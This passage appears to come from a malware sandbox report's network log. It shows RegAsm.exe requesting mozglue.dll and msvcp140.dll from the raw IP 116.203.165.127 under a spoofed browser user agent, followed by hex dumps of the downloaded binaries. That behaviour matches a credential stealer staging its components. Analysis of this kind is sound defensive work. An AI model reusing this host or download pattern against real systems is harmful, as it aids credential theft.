2024-09-21 12:49:03 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:03 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:49:03 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 12:49:03 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-21 12:49:03 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-21 12:49:03 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-21 12:49:04 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-21 12:49:04 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-21 12:49:04 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-21 12:49:04 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-21 12:49:04 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-21 12:49:04 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-21 12:49:04 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49763	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:05 UTC	199	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:06 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:05 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:49:05 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 12:49:06 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-21 12:49:06 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49765	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:07 UTC	200	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:08 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:07 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:49:07 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
